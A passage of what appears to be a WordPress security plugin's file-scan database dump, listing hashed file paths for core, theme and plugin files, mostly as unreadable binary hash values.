\'���_U;0�/<�','wp-admin/includes/class-bulk-theme-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�:y�x1s)����','�Ϲ���ݶ1SXCTڼ�<�ڊh`���V','',0,'?'),(' *@ADғ�=pu���E','wp-admin/user-new.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���W2# �3�','8庹���R0H����m�я�Ȯ�Я&m','',0,'?'),(' 5��rD�g�籃�','wp-content/plugins/wordfence/views/dashboard/options-group-license.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IT�愭��,�;_','��@��q��>G�C�|�U��sC��p���','',0,'?'),(' <@�s����\r��F��/','wp-includes/Requests/Exception/HTTP/305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X��\0�K��/`�,��&','H�Ǝ����+@�I���b��^=�QvM6_iL','',0,'?'),(' V��K+�L\Z*!���','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-admin-init.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���:jC�o\0\"��R�','*(��P�0eU�����!7p�Y�v��3','',0,'?'),(' ���=����g�V�|�','wp-content/themes/twentytwenty/inc/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�xM�ɞx���x�','���/�Ç�:�&�s�ۃu ���^&H','',0,'?'),(' �G�ʴ��Gtؑ��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/BLAKE2b.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Oū3�( ia�Y���(','����%��\Z0b��[u�#�v.�_�� O�=0','',0,'?'),(' �z�z{����L��H','wp-includes/rest-api/endpoints/class-wp-rest-blocks-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^�\"3R0������','��z�m1��xJ �g�Ь�xs�sIѻ˸�2','',0,'?'),(' �\r$ Q�^C(����','wp-includes/Requests/Exception/HTTP/505.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]A 3�[/Cd���','��⭛� i�{�PA�͆k���d���M\n���','',0,'?'),(' ��c̫)I�\np,͑��','wp-includes/css/jquery-ui-dialog-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xs!�����U,U���','�Y� 4�0���@��>Wb�5!4����','',0,'?'),(' ��p��E�4q�&?J�','wp-content/plugins/wp-cerber/assets/flags/im.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),(' �CX�l�Y��k���b','wp-content/themes/skt-toothy/images/icon-phone.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b�Ti! :���^','�b�#h�W� �4-����}4 ޑ)�,','',0,'?'),('!���u����詏','wp-content/themes/doctors/core/assets/css/owl.carousel.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������o_%&��!','RT3�Qmم��C�|흄c�q�z�a%�','',0,'?'),('!o�\r��A��v7��e','wp-admin/update.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��t&���V�݁6�ָ','mcT)��Ҝ�O>y�n/@i\"+�5dJ��@���','',0,'?'),('!-r���R(�u���͌','wp-content/themes/regina-lite/inc/libraries/welcome-screen/data/demo.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1\"F_���u����ETj','�@\"x�n�꽬Ȟ�K��3(��D�{Đ�=','',0,'?'),('!1b݅9��*�\\��','wp-admin/admin-footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��R��#�ttIrzX�K','Vo�梌>�)�x����Z���EB�O��','',0,'?'),('!I�d]5$���[��~�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o��L�� k\'k1��','��1�\\�Qt�*���J���%���s��&','',0,'?'),('!Plu6�������CZ','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����P���e��1','T���*��+���z]ʜ;>�\n�3���]?x�','',0,'?'),('!_��輵p3p�n��L','wp-includes/images/smilies/icon_eek.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/I ���x�)�(\"��','�8�����K҇���4������!��:ʰ','',0,'?'),('!|(�y�W�*1Oo2Cu','wp-includes/js/wp-api.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�BY�f��b�b2�lз','�N�_���R\"T������%i�c��ő� 2&�H','',0,'?'),('!��xx�+!���[�(','wp-includes/js/dist/list-reusable-blocks.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t��|�eɤs^�Q�','���f��i7� �L�:��r;�8\"�h<s�P�','',0,'?'),('!���b����FXɘ=�','wp-content/themes/regina-lite/layout/images/home/testimonial-4.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n(�8�rǐ7֦�J','�<����Tl�\\����w\"�%W\"��#��','',0,'?'),('!�w<���A\n�@�O','wp-includes/js/dist/hooks.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<q@o�P��u����','+���(�������d��C%�\'��\Z��v��NR','',0,'?'),('!����?o�`+7i�ȭ','wp-content/themes/doctors/core/contents/loop_templateAbout/skin1/html.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('!��y��\'U��b��#}','wp-content/plugins/wordfence/views/waf/options-group-rate-limiting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�zY��衆:��Lk','3`R<��!���0)B��W�gH�Z��','',0,'?'),('!�##sw:\rH*�$q�','wp-content/plugins/wordfence/lib/menu_tools_diagnostic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�u$�j�6�uwq�t�','�r\"��(�-w�a$A�2\"�7��\\��Vb�','',0,'?'),('!��⋶��Z]��n-','wp-includes/block-patterns/quote.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c�:�v,^8^����\"�}','����@��]y�%U?�vw�Xl�^�{q�','',0,'?'),('!��\')�qM*�Xc','wp-includes/blocks/embed/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�B���S�):\\l�ID�','��$Xn�{4��aV_`�M,sbݱ�\"�*3��','',0,'?'),('!�R���p�nL�w�m7','wp-includes/js/tinymce/plugins/lists/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�r?�N�ぼI��q\'�','%�=r������d��v\n��i�z�x�u��)3p','',0,'?'),('!ہ�Iǵ�`��8�t','wp-includes/js/dist/keyboard-shortcuts.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w�\ZH����%3kGUE','\"�����8�� �鎸\'��o83�J���w���','',0,'?'),('!߬�vg1�IV|�E�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/tag-clould/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[<��ԉ1��-�3��','�wB��;\\q\\�8�N�!��-�X����!��\n','',0,'?'),('!�Tۦ���� l�I�\n','wp-content/plugins/wordfence/lib/menu_tools_importExport.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�E��jk��Z:q�','�z�+e<OkM�Δ��t��� ��q��hW�','',0,'?'),('!�>лӊ^��[��U}�','wp-includes/js/dist/data-controls.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']���p���\r��sµ','�ӝk?������?���d�<���vc','',0,'?'),('!�O�4�bCRR�fO�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R����͡�RI0��[','�Ӆ�_3�:��þAs�N���0*Y�g�5�','',0,'?'),('!��Y0-z1�dm>�','wp-admin/js/plugin-install.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{�a6���:)�\n','A`�� �w���D�ܞ�n-����SU7�\Zm','',0,'?'),('\"Et�y�s����\Z|g','wp-includes/js/tinymce/plugins/wptextpattern/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E ��-N�o����','�L�I�Y�ow�)�4!:�;?��','',0,'?'),('\"��Q,)�^9\Z��3�','wp-content/themes/skt-toothy/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"9��sF:�t�\rG��','���F�}�Ռ���O�X���� #����#�','',0,'?'),('\"��Cff)u�ԥ�','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/epsilon.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��G�d{���\\��','�*�\"��礚\'�_�X䥋�XJ�I�ky�k','',0,'?'),('\"(}G��r� 0��V(','wp-admin/ms-options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~<�b�s�\'�+�\Z�Q','q�J��R�_+�V�C%�~d���35k��x��','',0,'?'),('\"-�Ѳ\n2�j%�(o','wp-content/themes/twentynineteen/sass/layout/_layout.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!�&�\"��{����#*�','���v���@.|���s>0�O���A3jA���','',0,'?'),('\"0�rN1M���#���','wp-content/plugins/wordfence/vendor/composer/autoload_classmap.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�EӤ㭇��M��g��','Q��*\'���B�+E��ߞ��:��m��yu�W','',0,'?'),('\"8A\n=��ᇼfp5','wp-includes/theme-compat/embed-404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7�[R+S��A-\Za*e','�}�pN�\0�K��6�%),�o��`�)�1\08','',0,'?'),('\"IFn����@�a�}�9','wp-admin/includes/class-wp-themes-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o6����n+66��n���','\\AY�Q�ۂ�|�?�X�� �n�\Z��P3�L','',0,'?'),('\"N�M�����k�VO','wp-includes/js/dist/data.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~Vew����MBE��|�\\','|;\n%��A����@P��L���剟�Ib��','',0,'?'),('\"�\r�o�]\r:T0ۓ�%','wp-content/themes/twentytwentyone/assets/sass/06-components/editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����k/Fc��t�','���J��%���g�����\0L;�7��R�','',0,'?'),('\"���K�6^�4V�}��','wp-includes/blocks/spacer/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9j5�w�s(�ڱ���I','1� ib��ǎ�ҫ�&�dV5�ojd\"���2�@��','',0,'?'),('\"�C���M�A��\"�;�','wp-content/themes/skt-toothy/customize-pro/example-1/class-customize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'������D,�E�V�*','G̓��13�V�r���YPST6�)��\\0(�\'','',0,'?'),('\"�\\�;T��4���X�','wp-content/themes/twentytwenty/inc/svg-icons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-kE!�v�/���Mg��','D������v���:��8(uG��4\r','',0,'?'),('\"����b9��e�|�_�','wp-includes/feed-atom-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\�I�6bJ�i\"m��','+.4�0�I�g�(��b��}���yтK��kb�5','',0,'?'),('\"���Ȏ�$�#B�I','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/img/three-column.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����-M#�xB���',':�l�Z=��cBN��Brz�;M��E��yȌ1u�','',0,'?'),('\"�����u>1�7���','wp-includes/class-pop3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��~���k�X�_��','*�,\\d�W̅�\Z��)`9�N�Q�@J5h&G�','',0,'?'),('\"�Z�_Z\0\0���y�','wp-content/plugins/wp-cerber/assets/flags/mu.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i�1�����($+a�','m� )���5p�PP�:�|X������u��\0j�','',0,'?'),('\"���l!l`0t�$sl','wp-content/themes/healthcare/bootstrap/js/npm.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����۩�#�t�~','�l�g�eJ�x�!��F���[3Lx��^@','',0,'?'),('\"��6\r+K{�\Z!a','wp-admin/comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�$���D��[@o','�X��=e.��>�o�����E�����','',0,'?'),('\"�w��h����','wp-admin/includes/class-automatic-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ͷ��,?�i�|�','D�]��y�� B�j�&�kK e��1:��*�','',0,'?'),('\"��0�\0�L�\'M��','wp-includes/sodium_compat/src/Core32/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�5��e�f��#�ϝ','��i��\rC��\"Գ�\r4��8�c��S��','',0,'?'),('\"�J���2�\rߤ-H�&','wp-includes/js/dist/date.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';�̆H;M�6ɻj�','w��y��D���~�`,�SM�\0�4+�MA','',0,'?'),('#�z1h�����;','wp-content/themes/twentynineteen/sass/navigation/_navigation.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tx߰+e�=�SF�','��5,����nR��j�t�ݑ���ʦ/���','',0,'?'),('#\n��/��PZ~h��','wp-content/plugins/wordfence/lib/email_genericAlert.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+I*kC�e;�P����S','��_\'\\q��F0��{�ТF�\r��.�OK','',0,'?'),('#T�@�$]i�r�l','wp-content/themes/doctors/editor-style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':b]ou�T���\0s.;��','�U@�R%2w34y� [�&�8�\"t�-|��F��','',0,'?'),('#/�/;��9${d�<K�}','wp-content/themes/doctors/author.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ٗ��^��n�jh�|�','ƥrz���l���/��\\@�#���ko\'','',0,'?'),('#D�ń�����5%��','wp-includes/class-wp-hook.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+%Yj�͑�Q �^��(','�@I*�۷�����}O�&?����8��q�','',0,'?'),('#N\"�*�]�]&��\'Ϛ','wp-content/themes/doctors/core/contents/loop_author/author.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3#h� ��[��oT�_�','t�m1�mP�㟕Ij�t��\nJWS5u ����4�','',0,'?'),('#W�\n��Y�,!Z��*�','wp-content/plugins/wp-cerber/assets/flags/sn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7��-#��9���uQ','i}2��3��&�ܓ��w0��r��wJ,�','',0,'?'),('#^ ̉�Θ!�M�z?{{','wp-content/plugins/wp-cerber/assets/flags/gs.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���~�\Z7c�o#.','o=b�i�e�U�\Z�N�1>��Vy��..��3Z`�','',0,'?'),('#y���t(�$NT��t�','wp-includes/Requests/Proxy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@k7�\0��t�\\*��G','�w<PB��ZC�k�SI�Q!��\n}i','',0,'?'),('#煽$8f5m�v�5�','wp-content/plugins/wp-cerber/nexus/cerber-nexus-master.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��H��ѓ�+��','쏂^�/�A���<�! �Q��!-��2\\','',0,'?'),('#�QCw��3e���X�9�','wp-content/themes/twentynineteen/sass/site/footer/_site-footer.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��|��\0����7���','@U���JL�$)\ZO\\|��bS|o�R���','',0,'?'),('#�}s���a��a��,!','wp-content/themes/twentytwentyone/assets/sass/06-components/header.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,�50�~�����','�;{֗88}���\r�|�ѫ�^���@Fj','',0,'?'),('#�-g�\\L%3�SB#\r','wp-content/plugins/wordfence/images/wf-horizontal.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E%Z�l��o9͒����','��0 ��6�ӭ�Iv����hJ��`����','',0,'?'),('#�ۘ�ƿ��.u�L� ','wp-content/plugins/redirection/locale/json/redirection-en_GB.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�bժԢ�\'J��e�0b/','���ږ\r�\0�Eˮ��,�b�V1ŕÓ\"','',0,'?'),('#��iU�f�����zhJF','wp-includes/sodium_compat/autoload-php7.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������n��4��','�-��r*H��^��O�<�a{����X�@�g �+','',0,'?'),('#�4\n�e�4^&R��{�','wp-content/plugins/wordfence/js/admin.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�D���T�B�`����','�\"���w�^s�.�$o�4ʻo�����߹T@4','',0,'?'),('#�g�]svi������','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-radio-buttonset.php',0,'T�ǣ������\0�<�','T�ǣ������\0�<�','(%��O �CW��I�VXV����29�_��\\�','',0,'?'),('$\\��Q���L?�1&�{','wp-content/themes/twentytwentyone/assets/sass/05-blocks/file/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���)��Ņ���n��','�/5�l��d�eR�����H���Z��V�','',0,'?'),('$}�n[���tS�=_','wp-content/themes/regina-lite/layout/css/mobile.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�\r����ږ�0~��','��v�% ?�f[4��\r�3%�G�sb��ņ�','',0,'?'),('$&��A�ÆJ���_!6�','wp-content/plugins/wp-cerber/assets/flags/my.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','QG��M� �;k��=�','_PL��0�\0�:��sP㱤��b�G6Ia�','',0,'?'),('$7y���]���N�','wp-content/plugins/wordfence/views/scanner/issue-suspiciousAdminUsers.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P�<\0cA�F�L��N','R]`�[��2��#�X��Éi(�E\n`��rJ�','',0,'?'),('$8}��eD$�赑�','wp-content/plugins/redirection/fileio/json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.��r0̾���Z','R�>^��_����;�:�N�����!�l','',0,'?'),('$N�P��9������','wp-content/plugins/wp-cerber/assets/flags/tn.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0$Z�,a��8&��1','�E[�\"�-+����Np�m����f��p�+�W�','',0,'?'),('$m�J��C8���','wp-content/themes/regina-lite/inc/next-compatible.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���8jpoB\"��v�','�}s�M��/��zk=�O���o+ޅD�)N1','',0,'?'),('$�w�7���@)s&��V&','wp-content/plugins/all-in-one-wp-security-and-firewall/images/error.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','¨S�N]eD6�����@','<�j��3a���a��k�l-X���','',0,'?'),('$����0S\r�r���','wp-includes/images/smilies/icon_redface.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����U���E����','>���D�C9M�cJ�\Z+U���L1f+g���','',0,'?'),('$�ٰJ��w{��P�ۑ','wp-content/themes/weblog/acmethemes/hooks/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>ۃc�LMG','g�q3>��30��d�L�Lg�\\�y��B.x:\Z�','',0,'?'),('$��S�Ck��d�W�','wp-content/plugins/wordfence/views/scanner/issue-timelimit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J7^��њO���i','5Qg��wB��H.f��<�<Zh&�V�','',0,'?'),('$�V��|�hhy����','wp-content/themes/twentytwenty/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a���#C���4Y�','T�Z�e��g�ҫR��!M��x�0�^�l\r�','',0,'?'),('$���C����/�9��','wp-includes/class-wp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�I�֩�Eu&S^:�9','���t�D�MQ��ҊW8�����&���8','',0,'?'),('$��-#q`�l�$W�ۉ','wp-content/plugins/wordfence/lib/live_activity.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�����Ӛ%=Z�&3','�s�R�#bǟy��,�K=�l�!�Ϩ�t��.','',0,'?'),('$��|��c�� \\~��','wp-content/plugins/wordfence/views/scanner/issue-control-edit-comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\�^>�5�pa��W��>','���������DC��XG4WFP�#�N�S\Z','',0,'?'),('$��^���6bH^�*��','wp-admin/options-privacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L��q/�ʵ�����4','p�H� w�h�66]��� �m���E_��','',0,'?'),('$�ϫ/����!��C�','wp-includes/IXR/class-IXR-introspectionserver.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2Ua�w�<�Iw�p�O7-','��\n���C����PEQ%�D\r�k*�X���o','',0,'?'),('%�]M�3�T�1T��/','wp-includes/blocks/preformatted/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Lr\r,�Av`�� ���T','6�.�_��*��NMo�\r��k��n�Z�\r/��+','',0,'?'),('%�k�~��B����*6','wp-content/themes/weblog/assets/library/SlickNav/jquery.slicknav.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y2�ܘ\\K��ȟ�','eԱ\'�\\=/⡉K�)��\".�Y�v�d��X�','',0,'?'),('%����7��娳�','wp-content/plugins/wordfence/waf/wfWAFUserIPRange.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y�FH��\'\'n��ގ�','KD[Rஞ� ��5�:grP7*X\Z','',0,'?'),('%$���M�q�T<��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C��UO��\Zߠ�xtH','�G\n\"�_/A�g�h U?�S�s�H�ב�Y��ٳ','',0,'?'),('%.�.Ct�=����\\`','wp-includes/sodium_compat/src/Core/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�v�1^l�&)g�4��','-�l����/6�\\����jx�R�\0Ю��~�','',0,'?'),('%?f�E���Ms���','wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-comments/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'G�V�I���','%[ kdT�9���5|�}-����U�$s_�W{�','',0,'?'),('%D?�m1QZ\"�cAXQq�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Insights.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G���=���1\nV�0�','8}�>��k6`��uid��eH�P�^�','',0,'?'),('%O�;��o)\nH�i���','wp-content/themes/doctors/core/home/home-data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z\n���ܟJ�w��','̮\Z��)��>���:��j�V��� ,f�\0�','',0,'?'),('%}�M���ha&�6�','wp-content/themes/twentynineteen/js/customize-controls.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2Z�P�s>��I�r','E�0R�p4RR���b\\`����a1&�g�����','',0,'?'),('%���9��\\ދ�','wp-admin/includes/class-wp-site-health-auto-updates.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!���W���Ni\r��ag','��Z�I��%�W��~�h\0x�ir�!��cJ�b','',0,'?'),('%����8^�V<�t�','wp-admin/edit-tag-form.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ߜ8���]��a','Z��<P���^�k$�>aK�a��G��s*','',0,'?'),('%�fW��� �P0�}+','wp-content/plugins/wordfence/modules/login-security/img/menu.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p����]�j-����','8�����#̄(8��O�\"� +h\"Fb��','',0,'?'),('%�Pb.��8�Gd�t�','wp-admin/css/media.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(;Hd����(�_�e�R','Sݱ`�� 6�Xi�\0�v�4K��E�qzi','',0,'?'),('%�yo���R�B��uD�','wp-content/themes/healthcare/css/font-awesome/less/list.less',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Uq2<������6�\'','g�_����\n٩���غ�b�\\�[놜�ȿ','',0,'?'),('%�~2\" ض=�ǿ\Z^�','wp-content/plugins/wp-cerber/assets/magnific/magnific-popup.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0���vre����\n�`�','�X�;��Ɛ��9�@u�j�m�[��F�\"!�','',0,'?'),('&@א� ���n�','wp-content/themes/doctors/core/contents/loop_templateContact/skin1/html.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('&PDt�?5u�1Ym��','wp-content/plugins/wordfence/crypto/vendor/composer/installed.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����q�jy*_iI�','��z�~t�i������D�5\Z�9l9;�I�','',0,'?'),('&��JuBßǃW�&:','wp-content/themes/weblog/acmethemes/customizer/design-options/default-layout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�No�ts$m���{','�~q�����{��A��*�f6��K*BLF�6�','',0,'?'),('&*���dĆָ� �H5','wp-admin/images/align-center.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �\Zݶ�4y�dY1�e�','�놽N3�X!��lj�h`�����hA]�J�','',0,'?'),('&.��C���F�h\\-�2','wp-content/themes/twentytwentyone/inc/menu-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|8\0�=5xv���3�','��y��\nI����\\��d��0����M�U','',0,'?'),('&=\Z�+t�\"�/k\'\n','wp-includes/js/jquery/jquery.form.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','܉l�Ȍ��*��D�','zt�O1� =2X����Q���_�y �}Z\r','',0,'?'),('&D��2��M�6��Q+','wp-content/themes/doctors/core/contents/loop_templateAbout/skin1/css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('&ee�\n3K���vZ��','wp-admin/ms-delete-site.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?bڔ��3��\r\n]m��','�jn�B����TN�&�e��>h��m���uIz<','',0,'?'),('&k\0v_fcb��v�����','wp-includes/js/dist/format-library.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9���h���d6��.{�','�H��? �pq+���t?��l��U��n\'�o�Q�','',0,'?'),('&t!0^g��bJ�c,>3','wp-admin/upload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����E_-�\r3�','X˔&��(�N�\\F�0%��o�0��>�','',0,'?'),('&~�*m�E+nX�%;[O�','wp-includes/css/dist/block-library/common-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ne��:ʎ)����hVH','�v7��7��a�L�zи�?9!D��4�','',0,'?'),('&D���Q�R��w�]','wp-includes/sodium_compat/src/Core/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��-r�jiI�أe�b','��b��E����&q�����*��������','',0,'?'),('&���ɚ%��)�W&�i','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/RepresentedCountry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>XVD��m�|P6\n','�l=�b:џ�� R�Z�� ����� ��6','',0,'?'),('&���Rw?~�j�hJ�D','wp-includes/Text/Diff/Renderer/inline.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\n�n5�P�����B\'�','X�U.k�@-(��5�N�����V','',0,'?'),('&��]0W��\n)�=��','wp-includes/js/tinymce/plugins/directionality/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Er�HD��D��3��@','<����o�@�:����-�Eg���)6^Ѽ\'��','',0,'?'),('&�`�O�Q5�Q�43�','wp-admin/theme-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�\"��}<м�鵴','$��Sl����\Z���P5��z7���H�','',0,'?'),('&��� P�shcusS','wp-content/wflogs/attack-data.php',0,'#ح\n���y�Ib�\r�\r','#ح\n���y�Ib�\r�\r','l��4Eq�{���������\'wg�31�c�w:�','',0,'?'),('&�Qu��9_�C�Fr�$','wp-content/themes/regina-lite/layout/css/owl-theme.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3o�c���d�p+S0','FFfT�U{�g�o 